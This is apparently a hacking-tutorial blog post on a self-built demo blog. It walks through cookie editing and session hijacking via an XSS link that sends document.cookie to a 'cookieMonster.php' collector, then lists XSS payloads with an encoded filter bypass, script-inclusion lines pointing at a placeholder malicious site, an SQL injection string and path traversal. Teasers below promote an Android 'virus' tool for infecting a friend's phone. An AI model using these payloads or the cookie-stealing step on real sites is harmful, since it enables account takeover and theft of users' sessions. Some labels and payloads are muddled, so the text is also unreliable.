Cookies, Code Injection and Session Hijacking

-

Code Injection: 

There are many ways to inject code, let's begin this section with cookie viewing and editing. Erase everything in your address bar, and type in javascript:alert(document.cookie);

Carefully examine the data

Now erase everything again and type javascript: void(document.cookie='user:=guest');

Run the original script again to view the cookie, as you can see you have changed the cookie data. This is how cookie editing can be used to possibly access a site through cookies. There are many tools that can be used to help automate this process such as: Paros Proxy, Burp Suite, and Web Scarab to name a few.

There are better ways to achieve this in a more targeted manner. Let's move on.


Session Hijacking:

Let's revisit the blog and see what we can do.

1) Open a different web browser and point it to the main page.

2) Log in to the anonymous account with the attack browser and create a post with a hyperlink in the blog that points to the cookie stealing code that i have created, the file is named cookieMonster.php the XSS link should look like this <a onclick="javascript:document.location='/ghost/cookieMonster.php?monster='+document.cookie;">Pics</a>

3) Log in as the administrator with the victim browser, view the post and click on the hyperlink

4) Go back to the attackers browser and go to mycookies.html

As you can see there is a new session that has been logged take the javascript from the page and insert it into the address bar. Go back to the blog and post a new message, as you can see you are now the administrator. This example is a little different from real world examples in the aspect that a lot of the time user authentication through sessions and cookies are either randomly generated, or the number is based on a mathematical algorithm. There are programs out there than can help try to predict the users next session id.





Let's start by using Xss!


There are many different Xss and CSRF attacks that can be used, lets start with the easy ones.


1) <script>alert('xss');<script>

2) <script>alert(document.cookie);</script>

3) <IMG SRC=javascript:alert('xss') /;>

4) Encoded for filter bypass - 

%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2fscript%3E


Now CSRF!


1) <script src="http://yourMaliciousCodeSite.com"></script>

2) <img src="http://some site you want to grab from">

3) <img src="http://a vulnerable site you want another user to inject to">


There are three ways to access this site:


1) Sql Injection - ' or 1=1--

Through the right query string with sql injection you should be able to dump the user:pass combo from the server, or log in as admin


2) Forced Browsing - ../../

The use of forced browsing is very common in servers that have not been secured properly. Sometimes you can find a text file containing information, or even access htdocs on a linux box. This site was set up for demonstration purposes. The file is located in the folder named "pass"


3) Examine the code to see if you see any hints

Many times developers will leave pertinant information inside of the code because they are rushed and forget to remove comments. Other possibilities are they hard coded certain information that can be use full for an attack. Always examine the code to look for clues.


Comments

Post a Comment

Popular posts from this blog

Hack Android with Infect Virus Installation and Usees

-
Image
HACK ANDROID WITH INFECT TERMUX HACKING TOOL Android devices are popular in the world. Imagine how funny if you infect your friend’s device even if you don’t have hacking skills. Infect best Termux hacking tool will help us to do that. What is infect? Infect is a bash-based script that is officially made for Termux users and from this tool you can spread the android virus by just sending a link. Also, Infect is available on Termux, developers of this tool tested in on Termux. What are it’s features? Infect have some interesting features. Which are following:- [+] Dangerous virus tool! [+] Updated maintenance! [+] Easy for beginners! [+] Working virus tool for Termux! Installation process:- Now, before you install infect make sure you update and upgrade Termux. you can use these commands: $ apt-get update $ apt-get upgrade Then, after Termux finishes updating and upgrade, we move to the second step which is to install python. Do it only if you have not yet install python otherwise, you
Read more

JavaScript Object Notation (JSON) Injection

-
Image
Overview JSON injection may occcur when user or attacker controlled input is later incorporated without being encoded into the web server response. In other words, the attacker can send input which later is incorporated into the JSON response. Discovery Methodology JSON injection starts like any injection; find the possible input parameters including adding custom parameters (parameter addition attack) to see if the application will process them and place those inputs into the JSON returned by the server. (If we cannot get our input into the JSON returned by the server, we cannot inject the JSON.) Finding input parameters can be done using an ordinary Firefox browser. No special tools are required. This particular page has a drop down which is an input. Developers sometimes think that they control the web page. This of course is incorrect. The web page is running in the users browser. The user can do anything they want like change the page using Firebug. If you dont like that drop-down
Read more

Client-side Security Control Bypass with HTML ,CSS ,JavaScript

-
Image
  Client-side Security Control Bypass Overview Some web applications rely on client-side controls such as disabling form fields, limiting field size, JavaScript validation or other controls to prevent the user from sending malicious input. In all cases, any client-side control can be bypassed or ignored entirely. Not all applications that use client-side controls are vulnerable. Application which pair all client-side controls with an equivalent server-side version of the control may be secure. Quality applications often mirror all server-side controls with the client-side counterpart to reduce network traffic, prevent honest users from sending known-bad values and provide guidance. However applications depending solely on client-side controls are often vulnerable to injection and/or attacks on application logic. Discovery Methodology (Static source-code analysis) Applications using client-side controls will write the controls using client-side languages such as HTML, JavaSc
Read more